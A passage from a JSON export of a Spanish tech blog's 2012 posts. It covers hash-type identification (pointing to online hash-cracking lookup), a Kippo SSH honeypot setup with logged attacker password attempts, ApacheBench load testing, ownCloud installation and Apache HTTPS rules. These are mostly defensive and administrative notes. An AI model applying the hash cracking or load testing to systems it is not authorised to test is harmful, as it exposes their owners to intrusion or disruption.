md5(md5($pass).md5($salt)) [+] md5(md5($salt).$pass) [+] md5(md5($salt).md5($pass)) [+] md5(md5($username.$pass).$salt) [+] md5(md5(md5($pass))) [+] md5(md5(md5(md5($pass)))) [+] md5(md5(md5(md5(md5($pass))))) [+] md5(sha1($pass)) [+] md5(sha1(md5($pass))) [+] md5(sha1(md5(sha1($pass)))) [+] md5(strtoupper(md5($pass))) Si tenemos suerte, podemos encontrar el hash utilizando findmyhash.py, un script para buscar hashes en servicios de cracking online.\nReferencias » hash-identifier\n","permalink":"http://karpoke.ignaciocano.com/2012/05/15/identificar-el-tipo-de-hash/","summary":"\u003cp\u003eEl \u003cem\u003escript\u003c/em\u003e \u003ccode\u003eHash_ID.py\u003c/code\u003e, desarrollado por Zion3R, nos permite\nidentificar los posibles algoritmos utilizados para crear un \u003cem\u003ehash\u003c/em\u003e. En\nmuchas ocasiones no se puede saber qué algoritmo concreto se ha\nutilizado, pero nos devolverá una lista de candidatos.\u003c/p\u003e\n\u003cp\u003eEl \u003cem\u003escript\u003c/em\u003e compara el \u003cem\u003ehash\u003c/em\u003e con el tipo de \u003cem\u003ehash\u003c/em\u003e de algoritmos tales\ncomo: ADLER-32, CRC-32, CRC-16, DES(Unix), FCS-16, GHash-32-5, GOST R\n34.11-94, Haval-160, Haval-192 110080, Haval-224 114080, Haval-256,\nLineage II C4, Domain Cached Credentials, XOR-32, MD5(Half),\nMD5(Middle), MySQL, MD5(phpBB3), MD5(Unix), MD5(Wordpress), MD5(APR),\nMD2, MD4, MD5, MD5(HMAC(Wordpress)), NTLM, RAdmin v2.x, RipeMD-128,\nSNEFRU-128, Tiger-128, MySQL5 - SHA-1(SHA-1($pass)), MySQL 160bit -\nSHA-1(SHA-1($pass)), RipeMD-160, SHA-1, SHA-1(MaNGOS), Tiger-160,\nTiger-192, md5($pass.$salt) - Joomla, SHA-1(Django), SHA-224,\nRipeMD-256, SNEFRU-256, md5($pass.$salt) - Joomla, SAM -\n(LM_hash:NT_hash), SHA-256(Django), RipeMD-320, SHA-384, SHA-256,\nSHA-384(Django), SHA-512, Whirlpool, etc.\u003c/p\u003e","title":"Identificar el tipo de hash"},{"content":" Using vim is like talking to your editor in ’verb modifier object’ sentences, turned into acronyms.\n» yanpritzker.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/learn-to-speak-vim-verbs-nouns-and-modifiers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUsing vim is like talking to your editor in ’verb modifier object’\nsentences, turned into acronyms.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://yanpritzker.com/2011/12/16/learn-to-speak-vim-verbs-nouns-and-modifiers/\"\u003eyanpritzker.com\u003c/a\u003e\u003c/p\u003e","title":"Learn to speak vim – verbs, nouns, and modifiers!"},{"content":" Like a lot of people, I have gone retro when it comes to editors, using Vim for most of my day to day work. I’ve been doing most of my development these days in a terminal window, logged directly into a VM where I test my code.\n» rc3.org\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/the-grammar-of-vim/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLike a lot of people, I have gone retro when it comes to editors,\nusing Vim for most of my day to day work. I’ve been doing most of my\ndevelopment these days in a terminal window, logged directly into a VM\nwhere I test my code.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://rc3.org/2012/05/12/the-grammar-of-vim/\"\u003erc3.org\u003c/a\u003e\u003c/p\u003e","title":"The grammar of VIM"},{"content":"» dragonjar.org\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/curso-de-asterisk/","summary":"\u003cp\u003e» \u003ca href=\"http://www.dragonjar.org/curso-de-asterisk.xhtml\"\u003edragonjar.org\u003c/a\u003e\u003c/p\u003e","title":"Curso de Asterisk"},{"content":" The purpose of this document is multi-faceted. It is intended as:\nA gentle introduction to Upstart. A Cookbook of recipes and best-practises for solving common and not so common problems. An extended guide to the configuration syntax of Upstart. It attempts to explain the intricacies of Upstart with worked examples and lots of details.\nNote that the reference documentation for Upstart will always be the manual pages: this is merely a supplement to them.\n;\u0026rsquo; upstart.ubuntu.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/upstart-intro-cookbook-and-best-practises/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe purpose of this document is multi-faceted. It is intended as:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA gentle introduction to Upstart.\u003c/li\u003e\n\u003cli\u003eA Cookbook of recipes and best-practises for solving common and\nnot so common problems.\u003c/li\u003e\n\u003cli\u003eAn extended guide to the configuration syntax of Upstart.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIt attempts to explain the intricacies of Upstart with worked examples\nand lots of details.\u003c/p\u003e\n\u003cp\u003eNote that the reference documentation for Upstart will always be the\nmanual pages: this is merely a supplement to them.\u003c/p\u003e","title":"Upstart Intro, Cookbook and Best Practises"},{"content":" If you have made a text adventure in your mind that you really like, and you’re tired of dictating it and would rather make it in a computer language, this page is for you! I’m teaching you a shortcut to make a text adventure, for those who actually know Python.\n» bluezandmuse.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/how-to-make-your-own-text-adventure-on-a-computer/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you have made a text adventure in your mind that you really like,\nand you’re tired of dictating it and would rather make it in a\ncomputer language, this page is for you! I’m teaching you a shortcut\nto make a text adventure, for those who actually know Python.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.bluzeandmuse.com/final_site/how_to.html\"\u003ebluezandmuse.com\u003c/a\u003e\u003c/p\u003e","title":"How To Make Your Own Text Adventure On A Computer"},{"content":" Attack servers, crack passwords, exploit services, beat encryption - everything you need to protect yourself from evil.\nThere are two rules of computer security: one – don’t buy a computer; and two – if you have to buy a computer, don’t turn it on. If you break these rules then you’ll be opening yourself up to potential problems. No system is 100% safe from hackers, but by following a few simple steps you can make yours much harder for intruders to attack.\n» tuxradar.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/learn-to-hack/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAttack servers, crack passwords, exploit services, beat encryption -\neverything you need to protect yourself from evil.\u003c/p\u003e\n\u003cp\u003eThere are two rules of computer security: one – don’t buy a computer;\nand two – if you have to buy a computer, don’t turn it on. If you\nbreak these rules then you’ll be opening yourself up to potential\nproblems. No system is 100% safe from hackers, but by following a few\nsimple steps you can make yours much harder for intruders to attack.\u003c/p\u003e","title":"Learn to Hack"},{"content":"» kriptopolis.com\n","permalink":"http://karpoke.ignaciocano.com/2012/05/14/sobre-el-cifrado-completo-de-disco-full-disk-encryption/","summary":"\u003cp\u003e» \u003ca href=\"http://www.kriptopolis.com/cifrado-completo-de-disco\"\u003ekriptopolis.com\u003c/a\u003e\u003c/p\u003e","title":"Sobre el cifrado completo de disco"},{"content":"Un honeypot emula un servicio vulnerable, en caso de Kippo el de SSH pero los hay también para otros servicios como FTP o web, con el fin de registrar la interacción del atacante. De esta manera, se puede tener constancia de la técnica y el tipo de ataques que se llevan a cabo. El honeypot puede ser de baja interacción, si emula un servicio no existente, o de alta interacción, si trabaja sobre un servicio real. Kippo es de los primeros.\nInstalación y configuración Antes de instalarlo en Ubuntu, instalaremos las dependencias:\n$ sudo aptitude install python-twisted Creamos un usuario y una base de datos en MySQL para guardar los ataques:\n$ mysql -uroot -p mysql\u0026gt; CREATE DATABASE kippo; mysql\u0026gt; CREATE USER \u0026#39;kippo\u0026#39;@\u0026#39;localhost\u0026#39; IDENTIFIED BY \u0026#39;password\u0026#39;; mysql\u0026gt; GRANT ALL PRIVILEGES ON kippo.* TO \u0026#39;kippo\u0026#39;@\u0026#39;localhost\u0026#39;; mysql\u0026gt; FLUSH PRIVILEGES; Crearemos un usuario sin privilegios en el sistema para ejecutar el honeypot:\n$ sudo adduser kippo Cambiamos de usuario:\n$ su kippo Descargamos el código y lo descomprimimos:\nkippo$ cd kippo$ wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz kippo$ tar -xvzf kippo-0.5.tar.gz kippo$ cd kippo-0.5 En este directorio podemos encontrar:\ndl/: donde se guarda los ficheros descargados mediante wget log/kippo.log: donde se guarda información de uso y depuración log/tty/: logs de las sesiones utils/playlog.py: herramienta para reproducir los logs de sesión utils/createfs.py: utilizado para crear fs.pickle fs.pickle: falso sistema de ficheros honeyfs/: contenido del falso sistema de ficheros. Aquí podemos poner una copia de un sistema real. Creamos la estructura de la base de datos mediante el script proporcionado:\nkippo$ mysql -ukippo -p -D kippo \u0026lt; ./doc/sql/mysql.sql Añadimos la configuración de MySQL al final del archivo de configuración de Kippo, kippo.cfg:\n[database_mysql] host = localhost database = kippo username = kippo password = password Para arrancar el honeypot:\nkippo$ ./start.sh Starting kippo in background...Loading dblog engine: mysql Generating RSA keypair... done. Controlando la actividad Podemos comprobar que el honeypot está a la escucha ejecutando:\n$ sudo netstat -atnp | grep 2222 tcp 0 0 0.0.0.0:2222 0.0.0.0:* ESCUCHAR 6800/python Podemos hacer las primeras pruebas desde la máquina local. El usuario es root y la contraseña 123456:\n$ ssh -l root -p 2222 localhost Para ver las últimas 10 contraseñas utilizadas:\n$ mysql -u kippo -p -D kippo -e \u0026#34;select * from auth order by timestamp desc limit 10;\u0026#34; +-----+----------------------------------+---------+----------+------------------------------+---------------------+ | id | session | success | username | password | timestamp | +-----+----------------------------------+---------+----------+------------------------------+---------------------+ | 153 | 7258df989e6d11e1be4f00030d3cf419 | 0 | root | rk08xvx12! | 2012-05-15 09:07:51 | | 152 | 70c8b7e89e6d11e1be4f00030d3cf419 | 0 | root | bufusimata | 2012-05-15 09:07:49 | | 151 | 6f30e1949e6d11e1be4f00030d3cf419 | 0 | root | murgu123 | 2012-05-15 09:07:46 | | 150 | 6d9fe3529e6d11e1be4f00030d3cf419 | 0 | root | iamana | 2012-05-15 09:07:43 | | 149 | 6c10533c9e6d11e1be4f00030d3cf419 | 0 | root | pulamea1985 | 2012-05-15 09:07:41 | | 148 | 6a8135a49e6d11e1be4f00030d3cf419 | 0 | root | Zpfljk,fkczddjlbnm\u0026#39;njnGFHJKM | 2012-05-15 09:07:38 | | 147 | 68e833509e6d11e1be4f00030d3cf419 | 0 | root | yachTicDokdipow | 2012-05-15 09:07:35 | | 146 | 675810649e6d11e1be4f00030d3cf419 | 0 | root | Y88..88P | 2012-05-15 09:07:33 | | 145 | 65c925449e6d11e1be4f00030d3cf419 | 0 | root | ~X4CK3R | 2012-05-15 09:07:30 | | 144 | 6439d5849e6d11e1be4f00030d3cf419 | 0 | root | vK94 | 2012-05-15 09:07:28 | +-----+----------------------------------+---------+----------+------------------------------+---------------------+ 10 rows in set (0.01 sec) Una opción interesante es reproducir la sesión de un usuario mediante el script playlog.py. Por ejemplo:\n$ python utils/playlog.py -b -m 2 log/tty/20120513-141543-2892.log 0 Acceso desde el exterior El honeypot se ejecuta en el puerto 2222, por defecto, por lo que deberemos crear una redirección desde el puerto 22 (para que se ejecutase en el puerto 22 debería tener privilegios de administrador, y esto es algo que no queremos). Para redirigir el puerto podemos utilizar la NAT del router, o utilizar iptables si queremos que a redirección se lleve a cabo en el propio equipo:\n$ iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 22 -j REDIRECT--to-port 2222 Si estamos utilizando algún tipo de cortafuegos, por ejemplo ufw, deberemos crear una regla para permitir el acceso:\n$ sudo ufw allow 2222 Para comprobar que se puede establecer la conexión podemos utilizar nmap:\n$ nmap -PN -sV -p 2222 192.168.50.75 Starting Nmap 5.21 ( http://nmap.org ) at 2012-05-13 14:12 CEST Nmap scan report for terminus (192.168.50.75) Host is up (0.0018s latency). PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0) Service Info: OS: Linux Referencias » Kippo » Installing kippo on a ubuntu system » Instalando kippo, un honeypot SSH » kippo honeypot on ubuntu 10.04\n","permalink":"http://karpoke.ignaciocano.com/2012/05/13/kippo-probando-un-honeypot-en-ubuntu/","summary":"\u003cp\u003eUn \u003cem\u003ehoneypot\u003c/em\u003e emula un servicio vulnerable, en caso de \u003ca href=\"http://code.google.com/p/kippo/\"\u003eKippo\u003c/a\u003e el de\nSSH pero los hay también para otros servicios como FTP o web, con el fin\nde registrar la interacción del atacante. De esta manera, se puede tener\nconstancia de la técnica y el tipo de ataques que se llevan a cabo. El\n\u003cem\u003ehoneypot\u003c/em\u003e puede ser de baja interacción, si emula un servicio no\nexistente, o de alta interacción, si trabaja sobre un servicio real.\nKippo es de los primeros.\u003c/p\u003e","title":"Kippo, probando un honeypot en Ubuntu"},{"content":"Si queremos que nuestros enlaces se abran en una ventana nueva podemos utilizar el atributo target para las etiquetas \u0026lt;a\u0026gt;. Sin embargo, si utilizamos un esquema XHTML Strict este atributo no es válido para ninguna etiqueta. El motivo es separar la presentación del contenido del comportamiento, y el atributo target modifica el comportamiento.\nUna alternativa es utilizar Javascript para conseguir el mismo efecto. Si Javascript no está disponible simplemente se abrirá en la misma ventana. Con Javascript, además, podemos conseguir que la ventana se abra en segundo plano, aunque sólo en algunos navegadores, como por ejemplo Chromium. En Firefox es necesario modificar un parámetro que viene desactivado por defecto.\nPara activarlo en Firefox, vamos a Herramientas \u0026gt; Opciones. En Contenido debe estar activado Habilitar Javascript, y en opciones Avanzadas de Javascript se debe marcar \u0026ldquo;Abrir o cerrar ventanas\u0026rdquo;.\nPara distinguir los enlaces que queramos que se abran en segundo plano de los que no, por ejemplo enlaces internos, tenemos varias alternativas. Podemos utilizar el atributo rel=\u0026quot;external\u0026quot; o asignarles una clase, y luego utilizar un selector jQuery para seleccionarlos. Algo así:\n$(\u0026#39;a[class=\u0026#34;targetclass\u0026#34;]\u0026#39;) Otra forma es aplicar un filtro para seleccionar sólo los enlaces cuya dirección no contenga nuestro dominio.\n$(\u0026#39;a\u0026#39;).filter(function() { return this.hostname \u0026amp;\u0026amp; this.hostname !== location.hostname \u0026amp;\u0026amp; this.hostname.indexOf(\u0026#39;.\u0026#39;+location.hostname) == -1; }) Este filtro dejaría fuera enlaces cuya ruta contenga nuestro dominio, algo como http://example.com/must/see/www.mydomain.com, aunque lo peor que sucedería es que el enlace se abriría en la misma ventana.\nUna vez que hemos seleccionado los enlaces que queremos, para abrir el enlace en una ventana en segundo plano, obligamos a que el foco se pase a la ventana padre:\nwindow.open(url); window.focus(); Otra forma es que la ventana hija pierda el foco:\nvar win = window.open(url); win.blur(); Todo junto, utilizando la función $ de jQuery, que permite ejecutar el código cuando la página haya cargado:\n$(function() { $(\u0026#39;a\u0026#39;).filter(function() { return this.hostname \u0026amp;\u0026amp; this.hostname !== location.hostname \u0026amp;\u0026amp; this.hostname.indexOf(\u0026#39;.\u0026#39;+location.hostname) == -1; }).click(function() { var win = window.open(this.href); win.blur(); window.focus(); return false; }); }); ","permalink":"http://karpoke.ignaciocano.com/2012/05/13/abrir-enlaces-externos-en-una-ventana-nueva-en-segundo-plano-usando-jquery/","summary":"\u003cp\u003eSi queremos que nuestros enlaces se abran en una ventana nueva podemos\nutilizar el atributo \u003ccode\u003etarget\u003c/code\u003e para las etiquetas \u003ccode\u003e\u0026lt;a\u0026gt;\u003c/code\u003e. Sin embargo, si\nutilizamos un esquema XHTML Strict este atributo no es válido para\nninguna etiqueta. El motivo es separar la presentación del contenido del\ncomportamiento, y el atributo \u003ccode\u003etarget\u003c/code\u003e modifica el comportamiento.\u003c/p\u003e\n\u003cp\u003eUna alternativa es utilizar Javascript para conseguir el mismo efecto.\nSi Javascript no está disponible simplemente se abrirá en la misma\nventana. Con Javascript, además, podemos conseguir que la ventana se\nabra en segundo plano, aunque sólo en algunos navegadores, como por\nejemplo Chromium. \u003ca href=\"http://stackoverflow.com/questions/2533305/window-focus-self-focus-not-working-in-firefox/2533335#2533335\"\u003eEn Firefox es necesario modificar un parámetro\u003c/a\u003e que\nviene desactivado por defecto.\u003c/p\u003e","title":"Abrir enlaces externos en una ventana nueva en segundo plano usando jQuery"},{"content":"Con un sencillo comando podremos saber la carga que soporta nuestro servidor web. Hay que tener cuidado contra qué servidor lo lanzamos y en qué momento, porque puede que interfiera o impida el acceso a otros usuarios.\nEl comando es ab, de Apache Benchmarking, y permite multitud de opciones, entre ellas el número de peticiones concurrentes, con el argumento -c, y la duración de la prueba, con el argumento -t:\n$ ab -c 5 -t 60 http://ip-del-servidor This is ApacheBench, Version 2.3 Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/ Licensed to The Apache Software Foundation, http://www.apache.org/ Benchmarking terminus (be patient) Finished 1337 requests Server Software: Incognito Server Hostname: terminus Server Port: 80 Document Path: / Document Length: 73260 bytes Concurrency Level: 5 Time taken for tests: 60.012 seconds Complete requests: 1337 Failed requests: 0 Write errors: 0 Total transferred: 98456145 bytes HTML transferred: 98020320 bytes Requests per second: 22.28 [#/sec] (mean) Time per request: 224.428 [ms] (mean) Time per request: 44.886 [ms] (mean, across all concurrent requests) Transfer rate: 1602.16 [Kbytes/sec] received Connection Times (ms) min mean[+/-sd] median max Connect: 4 16 12.0 14 261 Processing: 104 208 122.8 180 3679 Waiting: 6 23 93.5 16 3273 Total: 115 224 124.1 196 3688 Percentage of the requests served within a certain time (ms) 50% 196 66% 228 75% 250 80% 270 90% 324 95% 406 98% 466 99% 474 100% 3688 (longest request) En este caso, vemos que el servidor soporta algo más de 22 peticiones por segundo. Es el viejo servidor que aloja esta página, además de servir para otros menesteres. La página funciona con WordPress y está instalado el complemento WordPress Super Caché, las páginas cacheadas cargan más rápido, con lo que eso afecta al valor del resultado, es decir, es como si todas las visitas las hubiera hecho el mismo usuario, algo que normalmente no suele darse el caso.\nRealmente, la prueba no debería realizarse sobre una única página, sino que se debería obtener previamente un modelo de la carga del servidor, segmentado según varios parámetros como podría ser el tipo y el tamaño de fichero, y realizar las pruebas sobre dicho modelo.\nAdemás, la prueba se ha realizado desde un equipo en la misma red, por lo que si la prueba se hiciese desde Internet, los resultados serían algo peores, ya que el ancho de banda es menor.\nPor último, comentar que para que el valor sea lo más real posible, debemos hacer la prueba en un entorno controlado, sin que haya interferencias de otros usuarios o procesos, tanto en la red como en el servidor.\n","permalink":"http://karpoke.ignaciocano.com/2012/05/10/benchmarking-de-un-servidor-web/","summary":"\u003cp\u003eCon un sencillo comando podremos saber la carga que soporta nuestro\nservidor web. Hay que tener cuidado contra qué servidor lo lanzamos y en\nqué momento, porque puede que interfiera o impida el acceso a otros\nusuarios.\u003c/p\u003e\n\u003cp\u003eEl comando es \u003ccode\u003eab\u003c/code\u003e, de \u003cem\u003eApache Benchmarking\u003c/em\u003e, y permite multitud de\nopciones, entre ellas el número de peticiones concurrentes, con el\nargumento \u003ccode\u003e-c\u003c/code\u003e, y la duración de la prueba, con el argumento \u003ccode\u003e-t\u003c/code\u003e:\u003c/p\u003e","title":"Benchmarking de un servidor web"},{"content":"\nownCloud es una aplicación de código abierto que nos facilita tener nuestra propia nube, permitiendo guardar, sincronizar y compartir todo tipo de archivos, incluyendo imágenes, música y vídeos. También tenemos la posibilidad de incluir aplicaciones de terceros tales como un calendario, un gestor de contactos, un editor de texto, gestión de enlaces, etc.\nPara instalarlo en Ubuntu Lucid Lynx 10.04, seguiremos los siguientes pasos.\nInstalamos las dependencias, incluyendo algunas opcionales:\n$ sudo aptitude install apache2 php5 php-pear php-xml-parser php5-json zip php5-gd php5-sqlite sqlite php5-mysql id3v2 curl libcurl3 libcurl4-openssl-dev php5-curl Descargamos la última versión estable, en estos momentos 3.0.3:\n$ wget http://owncloud.org/releases/owncloud-3.0.3.tar.bz2 Comprobamos el MD5:\n$ md5sum owncloud-3.0.3.tar.bz2 01300ca8b8be549af166f568fef8538f owncloud-3.0.3.tar.bz2 $ wget -qO - http://owncloud.org/releases/owncloud-3.0.3.tar.bz2.md5 01300ca8b8be549af166f568fef8538f owncloud-3.0.3.tar.bz2 Descomprimimos el fichero:\n$ tar -xjf owncloud-3.0.3.tar.bz2 Lo movemos al DocumentRoot:\n$ sudo mv owncloud /var/www/ Le cambiamos el propietario a los ficheros:\n$ sudo chown -R www-data:www-data /var/www/owncloud Creamos la base de datos y el usuario en MySQL:\n$ mysql -uroot -p mysql\u0026gt; CREATE DATABASE owncloud; mysql\u0026gt; CREATE USER \u0026#39;owncloud\u0026#39;@\u0026#39;localhost\u0026#39; IDENTIFIED BY \u0026#39;password\u0026#39;; mysql\u0026gt; GRANT ALL PRIVILEGES ON owncloud.* TO \u0026#39;owncloud\u0026#39;@\u0026#39;localhost\u0026#39;; mysql\u0026gt; FLUSH PRIVILEGES; Nos aseguramos de tener habilitado .htaccess en Apache. Basta comprobar que en el fichero de configuración del sitio, la directiva AllowOverride para el DocumentRoot es All.\nTambién deberán estar instalados y activados los módulos mod_headers, mod_rewrite y mod_env en Apache:\n$ sudo a2enmod headers $ sudo a2enmod rewrite $ sudo a2enmod env Reiniciamos Apache:\n$ sudo apache2ctl restart Ya podemos acceder al panel de administración de ownCloud en http://localhost/owncloud. Creamos el usuario administrador y configuramos los valores de hemos utilizado en MySQL.\nActualizado el 28 de julio de 2012 Atención: Es necesario mover el directorio data fuera del DocumentRoot A partir de la versión 4.0.5, si utilizamos un directorio de datos que se encuentre dentro del DocumentRoot, al abrir la pestaña de Administración encontraremos algo como esto:\nYour data directory and your files are probably accessible from the internet. The .htaccess file that ownCloud provides is not working. We strongly suggest that you configure your webserver in a way that the data directory is no longer accessible or you move the data directory outside the webserver document root.\nTal como indica, el contenido del directorio data puede que sea accesible desde fuera de la red. No podremos obtener un listado de los ficheros que contiene, pero si supiéramos el nombre de algún fichero sí que podríamos descargarlo directamente, de cualquier usuario, incluso sin haber iniciado sesión.\nPara evitarlo, moveremos el directorio data a cualquier otro directorio que esté fuera del DocumentRoot, conservando los permisos que tenía, y acto seguido modificamos el fichero de configuración owncloud/config/config.php:\n\u0026#34;datadirectory\u0026#34; =\u0026gt; \u0026#39;/new/path/to/data\u0026#39;, Sólo queda reiniciar el servidor para que los cambios tengan efecto:\n$ sudo apache2ctl restart Acceso mediante Nautilius y WebDAV ownCloud lleva incluido un servidor WebDAV, por lo que podemos acceder desde Nautilus y montar el directorio. En Nautilus, vamos a Archivo \u0026gt; Conectar al servidor y además de nuestro usuario y contraseña, ponemos los siguientes datos:\nServer: localhost/owncloud Folder: /files/webdav.php Acceso seguro mediante HTTPS Si queremos obligar a que el acceso a ownCloud se haga a través de una conexión segura, podemos editar el fichero .htaccess del directorio /var/www/owncloud para que contenga:\nRewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} RewriteRule .* - [env=HTTP_AUTHORIZATION:%{HTTP:Authorization},last] Actualizaciones Instalar una actualización es tan sencillo como reemplazar los ficheros. Los directorios config/ y data/ no se verán afectados, por lo que no perderemos nuestros datos. La actualización se llevará a cabo cuando iniciemos sesión como administrador.\nActualizado el 24 de mayo de 2012 Acaba de salir la versión estable 4.0.0. Entre las mejoras de la versión 4.0.0 se encuentra el cifrado de archivos, cargar archivos arrastrando los ficheros, visor de ficheros ODF y muchas más.\nPara actualizar, simplemente descargamos la versión y la descomprimimos en el mismo directorio de instalación:\n$ wget http://owncloud.org/releases/owncloud-4.0.0.tar.bz2 Comprobamos el MD5:\n$ md5sum owncloud-4.0.0.tar.bz2 440837c2b4908a2ec06f96978d6b7525 owncloud-4.0.0.tar.bz2 $ wget -qO - http://owncloud.org/releases/owncloud-4.0.0.tar.bz2.md5 440837c2b4908a2ec06f96978d6b7525 owncloud-4.0.0.tar.bz2 Descomprimimos el fichero:\n$ tar -xjf owncloud-4.0.0.tar.bz2 Le cambiamos el propietario a los ficheros:\n$ sudo chown -R www-data:www-data owncloud Lo copiamos al DocumentRoot:\n$ cd owncloud $ sudo cp -r * /var/www/owncloud/ Reiniciamos el Apache:\n$ sudo apache2ctl restart Al iniciar sesión como administrador se lleva a cabo la actualización.\nSi nos encontramos con que nuestras canciones, marcadores o archivos han desaparecido, es posible que le lleve un tiempo a la aplicación escanear el contenido, podemos probar a cerrar sesión y volver a entrar, escanear de nuevo en busca de los ficheros o incluso volver a reiniciar el Apache.\nInstalar aplicaciones Para instalar una aplicación, la descargamos y la copiamos al directorio apps dentro de owncloud. Por ejemplo, la aplicación Files Move muestra permite mover los archivos de sitio desde la aplicación.\nPara instalarlo:\n$ wget http://apps.owncloud.com/CONTENT/content-files/150271-files_mv.0.21.tgz $ tar xvzf 150271-files_mv.0.21.tgz $ sudo mv files_mv/ /var/www/owncloud/apps/ $ sudo chown -R www-data:www-data /var/www/owncloud/apps/ Ahora deberemos activar la aplicación desde el panel de administración de ownCloud.\nProblemas al instalar algunas aplicaciones He tenido algún que otro problema instalando alguna aplicación, por ejemplo la anterior. La activación de la aplicación en el panel de control no se queda de forma permanente, sino que nada más recargar la página ésta vuelve a estar desactivada. Parece que es un fallo conocido.\nDespués de haber descomprimido, movido y cambiado el propietario de la aplicación, creamos el fichero /var/www/owncloud/refresh_apps.php, tal como sugiere sshambar:\n\u0026lt;?php $RUNTIME_NOAPPS = TRUE; //no apps, yet require_once(\u0026#39;lib/base.php\u0026#39;); // Setup required : $not_installed = !OC_Config::getValue(\u0026#39;installed\u0026#39;, false); if($not_installed) { header(\u0026#34;Location: \u0026#34;.OC::$WEBROOT.\u0026#39;/\u0026#39;); exit(); } OC_Installer::installShippedApps(); echo(json_encode(\u0026#39;Apps updated!\u0026#39;)); ?\u0026gt; Accedemos al fichero desde el navegador mediante http://localhost/owncloud/refresh_apps.php, y creará las entradas en la tabla oc_appconfig de la base de datos.\nAún así, esto no ha sido suficiente, ya que en dicha tabla quedaba registrada como instalada pero no activada, y seguía sin poder activarla desde el administrador, así que he probado a actualizar la base de datos de forma directa y me ha funcionado, pero no estoy seguro de que esto funcione en todos los casos ni de que no entrañe ningún tipo de riesgo. Así es como he logrado instalar File Move:\n$ mysql -uowncloud -p owncloud mysql\u0026gt; update oc_appconfig set configvalue=\u0026#34;yes\u0026#34; where appid=\u0026#34;storage_charts-v2.0\u0026#34; and configkey=\u0026#34;enabled\u0026#34;; Sin embargo, con la aplicación Storage Chart v2, que muestra el espacio utilizado por nuestros ficheros en la nuestra nube, lo anterior no me ha funcionado y la aplicación daba error, ni siquiera dejaba acceder al panel de administración, por lo que he tenido que deshacer los cambios.\nReferencias » ownCloud site » ownCloud support » ownCloud apps » ownCloud 2, your personal cloud server\n","permalink":"http://karpoke.ignaciocano.com/2012/05/10/owncloud-con-mysql-en-ubuntu-lucid-lynx-10-04/","summary":"\u003cp\u003e\u003cimg alt=\"Owncloud logo\" loading=\"lazy\" src=\"/images/owncloud-logo-300x148.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://owncloud.org/\"\u003eownCloud\u003c/a\u003e es una aplicación de código abierto que nos facilita tener\nnuestra propia nube, permitiendo guardar, sincronizar y compartir todo\ntipo de archivos, incluyendo imágenes, música y vídeos. También tenemos\nla posibilidad de incluir \u003ca href=\"http://apps.owncloud.com/\"\u003eaplicaciones de terceros\u003c/a\u003e tales como un\ncalendario, un gestor de contactos, un editor de texto, gestión de\nenlaces, etc.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Owncloud files\" loading=\"lazy\" src=\"/images/owncloud-files-300x119.png\"\u003e\u003c/p\u003e\n\u003cp\u003ePara instalarlo en Ubuntu Lucid Lynx 10.04, seguiremos los siguientes\npasos.\u003c/p\u003e\n\u003cp\u003eInstalamos las dependencias, incluyendo algunas opcionales:\u003c/p\u003e","title":"ownCloud con MySQL en Ubuntu Lucid Lynx 10.04"},{"content":"Si queremos que el acceso a un directorio concreto, es decir, que afecte únicamente la ruta relativa en la URL que accede a ese directorio, se realice mediante una conexión segura, suponiendo que ya tenemos configurado el servidor de forma adecuada, basta incluir en ese directorio un fichero .htaccess que contenga:\nRewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} Así, si por ejemplo, queremos que la ruta http://localhost/secure/ se acceda de forma segura, suponiendo que el DocumentRoot apunta a /var/www:\n$ pwd /var/www/secure $ cat .htaccess RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} ","permalink":"http://karpoke.ignaciocano.com/2012/05/10/forzar-el-uso-de-sslhttps-de-un-directorio-en-apache2-mediante-htaccess-y-mod_rewrite/","summary":"\u003cp\u003eSi queremos que el acceso a un directorio concreto, es decir, que afecte\núnicamente la ruta relativa en la URL que accede a ese directorio, se\nrealice mediante una conexión segura, suponiendo que ya tenemos\nconfigurado el servidor de forma adecuada, basta incluir en ese\ndirectorio un fichero \u003ccode\u003e.htaccess\u003c/code\u003e que contenga:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eRewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAsí, si por ejemplo, queremos que la ruta \u003ccode\u003ehttp://localhost/secure/\u003c/code\u003e se\nacceda de forma segura, suponiendo que el \u003ccode\u003eDocumentRoot\u003c/code\u003e apunta a\n\u003ccode\u003e/var/www\u003c/code\u003e:\u003c/p\u003e","title":"Forzar el uso de SSL/HTTPS de un directorio en Apache2 mediante .htaccess y mod_rewrite"},{"content":"\nPuede que alguna vez hayamos visto este mensaje en el panel de administración de phpMyAdmin:\nLas opciones adicionales para trabajar con tablas vinculadas fueron desactivadas. Para saber porqué, dé clic aquí.\nSi seguimos el enlace, nos lleva a la documentación donde nos explican que, a partir de la versión 3.3.x, está disponible el sistema de tracking, que es un sistema que permite realizar un 